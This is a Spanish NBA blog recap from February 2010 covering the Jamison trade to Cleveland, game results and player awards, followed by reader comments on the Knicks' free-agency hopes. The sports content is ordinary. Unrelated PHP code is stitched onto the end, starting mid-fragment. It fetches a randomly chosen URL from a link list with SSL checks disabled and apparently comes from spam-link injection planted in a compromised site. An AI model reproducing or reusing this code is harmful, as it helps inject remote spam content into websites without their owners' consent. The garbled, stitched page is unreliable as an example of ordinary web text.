La Cronica (17/02/2010)

18 de February de 2010 por telekoman

Cuando se acerca la fecha límite de los traspasos los resultados de la liga regular pasan a un discreto segundo plano. Hay más gente pendiente de los jugadores que pueden incorporar los equipos aspirantes al título que del resultado de un Memphis – Toronto, por poner un ejemplo. Y si se cierra un traspaso realmente importante como el de anoche entonces casi molesta la información típica de la jornada. Y es que Antawn Jamison se incorporará a la disciplina de los Cleveland Cavaliers en un traspaso entre 3 equipos que ha acabado con Sebastian Telfair acompañando a Jamison a los Cavs, con Al Thorton, Zydrunas Ilgauskas y una rondita en Washington y  con Drew Gooden en los Clippers como movimientos colaterales. Es más que posible que tanto Gooden como Ilgauskas acaben consiguiendo un buy-out de su contrato, de manera que podrían volver el primero a los Mavs y el segundo a los Cavs.

Esta tarde profundizaremos un poco en los últimos rumores que suenan en este último día antes del fin del período de traspaso pero no podemos dejar de comentar que parece hecho un Tracy McGrady x Kevin Martin aunque se está estudiando la manera de cuadrar los números.

Y pasando a la información mundana, 10 partidos de todos los pelajes nos presentaba esta segunda jornada tras el All Star.

El encuentro más importante enfrentaba a los Dallas Mavericks y los Phoenix Suns. Ganaron en casa los de Dallas por 10 puntos gracias a una buena defensa, aunque parezca increíble. El equipo de Cuban supo parar a todo el equipo de los Suns excepto a un motivado Stoudemire. Con la posibilidad de que este haya sido su último partido con Phoenix, Amare se fue hasta unos esplendidos 30 puntos y 14 rebotes. En pocos momentos la defensa de Haywood pudo pararlo, si bien se vieron buenas maneras en el ahora pívot de Dallas. Poco más que contar de los Suns ya que Nash estuvo sentado parte del partido aquejado de dolor de espalda. Por Dallas, Nowitzki llegó hasta los 28 puntos mientras que Kidd se acercó al cuadruple doble con 18 puntos, 10 asistencias, 7 rebotes y 7 robos. Butler sigue con su proceso de adaptación y se le vieron tan solo algunos detalles.

En el otro duelo del Oeste Utah ganó en casa de New Orleans gracias a los 24 puntos y 8 rebotes de Millsap y a los 16 y 15 rebotes de Boozer. Curiosamente esta año, Carlos Boozer no aparece en ninguno de los rumores. Por los Hornets el novato Darren Collison sigue aprovechando las oportunidades que le están llegando gracias a la lesión de Chris Paul.

Por su parte, San Antonio ganó apuradamente a Indiana gracias a la actuación final de Ginobili. Fue un partido realmente extraño en el que Tim Duncan capturó 26 rebotes, 11 de ellos ofensivos, pero se quedó en tan solo 8 puntos con un lamentable 4 de 23 en tiro. El que completa la tripleta, Parker, compensó la mala actuación de Duncan en el tiro con 28 puntos. Por Indiana nuestros sospechosos habituales, Granger y Murphy.

En Washington los Wizards se llevaron la victoria gracias a un Andray Blatche implacable con 33 puntos y 13 rebotes, que asumirá mucho protagonismo con la marcha de Jamison y a una cierta apatía del equipo de Minnesota donde tan sólo lograron alcanzar 14 asistencias entre todo el equipo. ¿Será Al Jefferson jugador de los Wolves mañana por la mañana?

En New York poco pudieron hacer, aparte de estar atentos a las noticias, para ganar a los Bulls. La tripleta Rose, Deng y Brad Miller consiguió 71 puntos y gracias a un gran último cuarto se llevaron la victoria. Enfrente Wison Chandler, Al Harrington y David Lee lo intentaron todo pero les faltó colaboración del resto de su equipo.

En el resto de partidos encontramos la victoria de Memphis en la prórroga frente a Toronto con 75 puntos entre Gay, Randolph y Mayo, a Orlando pasando por encima de Detroit con Howard como eje principal,  a los Warriors destrozando a los Kings, a New Jersey casi protagonizando la sorpresa de ganar a Miami gracias entre otras cosas a la lesión de Wade o a Houston apalizando a unos debiles Bucks y anotando 43 puntos en el tercer cuarto.

PREMIOS

MVP: Buenísimas actuaciones de Rudy Gay, Dirk Nowitzki o Jason Kidd, pero nos tenemos que quedar Dwight Howard y sus 33 puntos, 17 rebotes y 7 tapones.

El rookie: Destacamos a los de casi siempre. Tyreke Evans, 17 puntos, 5 rebotes y 10 asistencias, Darren Collison 24 puntos y 9 asistencias y Stephen Curry 24 puntos, 15 asistencias y 6 rebotes. El nivel del de los Warriors es brutal.

La sorpresa: Está claro que durante la desmantelación de los Wizards veremos actuaciones sorprendentes de alguno de los que jugadores que quedan en plantilla. Hoy le ha tocado a Andrey Blatche que ha podido con Al Jefferson y Kevin Love sin excesivos problemas. En los Warriors, CJ Watson aprovechó la baja de Monta Ellis para irse a los 40 puntos, 7 rebotes y 6 asistencias.

La decepción: Para un aficionado de los Pistons como soy yo, la decepción está durando toda la temporada y tiene como nombres y apellidos a Gordon y Villanueva. Pero como esto no puede ser constante le vamos a dar el premio al lamentable partido de Turkoglu. 1 punto, 1 rebote, 2 asistencias y 3 pérdidas no pueden aceptarse en un jugador con el sueldo y la experiencia del turco.

El mayor esfuerzo en vano: Varios pretendientes al premio. Bosh, Hamilton o Stoudemire se han ido por encima de los 30 puntos y 8 rebotes. Imposible decidir.

Comenta

15 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Este trapaso de Jamison es igual que el de Gasol. Un tío de 20 puntos y 7 rebotes por nada. Tremendo el movimiento de Danny Ferry (jugón auténtico).

    Los de New York deben estar realmente moscatel por el tema de los agentes libres de junio. Veremos como queda pero no tiene buena pinta.

      Citar

  2. mmmm dice:
    #2

    “aprofundiremos”
    Casi se me saltan los ojos!

    No entiendo el traspaso, la verdad, es regalarle medio campeonato a Cleveland, a no ser que las piezas no encajen (cosa poco probable). Si antes eran los máximos favoritos ahora ya ni te cuento. A ver si hay reacción por parte de los otros aspirantes.

      Citar

  3. sayim dice:
    #3

    Me parece una buena reflexion. Los Knicks son una de las franquicias históricas y llevan un par de años hipotecando las temporadas pensando en el “Maná del 2010” y ahora que pasa si Lebron renueva con los Cavs y se juntan Bosh y Wade en Miami? O si se decide alguno por los Bulls? En definitiva, algun jugador decente supongo q ficharan pero con el nivel actual de la plantilla y el fichaje de, por ejemplo, joe johnson da para primera ronda, no mas. Aparte de un mercado muy apetecible no creo q la propuesta de los knicks sea muy tentadora para los agentes libres….

    Esperemos a ver que pasa, pero me huelo otra gran decepción entre los aficionados del MSG

    Un saludo

      Citar

  4. TheDeerHunter dice:
    #4

    Juer mmmm!!! qué rápido has estado. No había tardado ni 5 minutos en corregirlo y en medio te has colado tú.
    En nuestra te diré que algunos utilizamos dos lenguas y en ocasiones eso nos produce un cierto desconcierto…

    Se habla de Sergio a las órdenes de D’Antoni. Mucha suerte para el Chacho. Se la merece ya.

      Citar

  5. Viva_Dirk dice:
    #5

    Hay muchos agentes libres el año que viene y NY tiene sitio para 2 contratos máximos, si no es ninguno de los 3 mas mediaticos podrian ser Joe Johnson, Boozer y otro muy buen jugador.

      Citar

  6. pcerezo dice:
    #6

    Viva_Dirk pero el problema que hay equipos que pueden ofrecer el máximo con mejores plantillas y aspiraciones.

    Me imagino que Hawks también le ofrecerán el máximo a Johnson y este chico ya lleva una reconstrucción a sus espaldas, meterse en otra.
    Boozer me imagino que fichará por un equipo campeón al igual que Bosh porque pasta le van a ofrecer donde vaya.

    El problema de New York es que no ofrece nada de nada. Su roster es terrible y la franquicia lleva una dinámica perdedora de 10 años y mucho, mucho tiempo sin play offs.

    Jugadores que quieran ser competitivos no creo que se metan a reconstruir ahora New York.

      Citar

  7. couxe dice:
    #7

    Hombre… New York no ofrece nada de nada a nivel deportivo por el momento como bien dices…
    Pero en el plano no deportivo, en lo que se refiere a fama, dinero, mujeres, glamour, fiestas, celebrities, etc… al margen de Los Angeles o puede que Miami, pocos destinos pueden pesar tanto en la decisión de una persona de veintitantos años…
    No sé qué harán este verano ni lo que conseguirán, y más viendo su “brillante” historial reciente de movimientos en el mercado… Es posible que la vuelvan a cagar, pero que tienen un poder de atracción enorme para los jugadores ni lo dudes…

    En cuanto a Sergio, espero que le den una oportunidad medio decente de una vez, porque pienso que puede ser un jugador muy válido y muy interesante para cualquier equipo que juegue rápido…

      Citar

  8. sergio dice:
    #8

    Como se duerma Tyreke.. Curry le quita el ROY. Madre mia q pedazo de jugador estos ultimos partidos, parece que le ha sentado bien el All-Star. Puede ser el unico que no ha notado el “rookie-wall” de mitad de temporada. Tambien esta claro que estar en los Warriors hincha tus estadisticas, pero el mantiene magnificos porcentajes y cuando lo ves sabes que conoce muy bien el juego. Espero que eche cuerpo y se aplique en defensa. Buenos tiempos para los bases segun parece.

      Citar

  9. sergio dice:
    #9

    pcerezo… tampoco lleva tantos años sin Playoffs. Bueno, a mi 5 años no me parecen tantos vaya. Equipos como Minnesota, Pacers, Clippers o Warriors han estado peor. Y New York es New York. Sabes que es un equipo con suficientes inversores para sobrepasar el limite salarial tanto como les venga en gana.

      Citar

  10. pcerezo dice:
    #10

    Lo de la pasta, mujeres, celebrities, etc…no creo que sea problema para ningún jugador de la NBA. Estoy seguro que se pueden zumbar por el artículo 34 a la que quieran, cuando quieran y como quieran.
    Por pasta, todos los agentes libres de los que hablamos van a recibir el máximo por lo menos de tres o cuatro franquicias por lo menos, si no son más.

    Por tanto creo, no sé si me equivocaré, que van a tener difícil fichar a dos super, super estrellas como se está hablando. Joe Johnson y Boozer no garantizan nada de nada. Solo Lebron o Wade pueden dar ese salto de calidad grande, grande que acorte en tres o cuatro años el solar que tienen allí.

    Un saludo,
    Pablo

      Citar

  11. M dice:
    #11

    Sebastian Telfair prometía muchísimo, en tiempos, ¿no?.

      Citar

  12. portu dice:
    #12

    1º sobre Curry: jugón tremendo. Yo espero q no gane kilos pq para base con 190 va más q sobrado y su juego es de fino estilista, así q prefiero q no pierda velocidad por ganar músculo.

    Sobre NY sí q veo alguna posibilidad de q Lebron se decante por ellos aun ganando el anillo con Cleveland, creo q LJ intenta labrarse un nombre entre los más grandes, ganar el anillo con Cleveland o varios anillos con el equipo q le han montado y q le seguirán montando es factible, sería más impresionante y sobretodo un reto enorme hacer q NY optase al anillo con él al mando. Por contra, Boozer o Joe aunque tengan buenos números no creo q den ese plus al equipo como para q salga de su dinámica negativa.

      Citar

  13. couxe dice:
    #13

    Hombre Cerezo… alguna influencia tendrá Nueva York, cuando en Cleveland ofreciéndole en lo deportivo uno de los 2 ó 3 mejores planteles de la nba, en lo económico el máximo salarial, y habiendo hecho en playoff lo que han hecho en los ultimos años, van a sudar tinta para retenerle…
    Si por puras cuestiones deportivas se moviesen los jugadores, ahora mismo NY no tendría ninguna posibilidad de llevarse a Lebron, ni a Wade, ni a ningún otro de los grandes… y a alguno se acabará llevando seguro… Que luego consigan algo con ello es otra cosa…

      Citar

  14. Txusma dice:
    #14

    El primo de Marbury era Telfair, no? Como ha acabado la familia…

    Sólo de pensar en la pasta que puede mover Lebron en NY me entran escalofrios. Y seguro que a David Stern también

      Citar

  15. pcerezo dice:
    #15

    Yo lo que veo es que NYes un berenjenal para Lebron. Los 20 millones que deja libre Shaq a final de temporada dan para otro agente libre.

    Pablo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>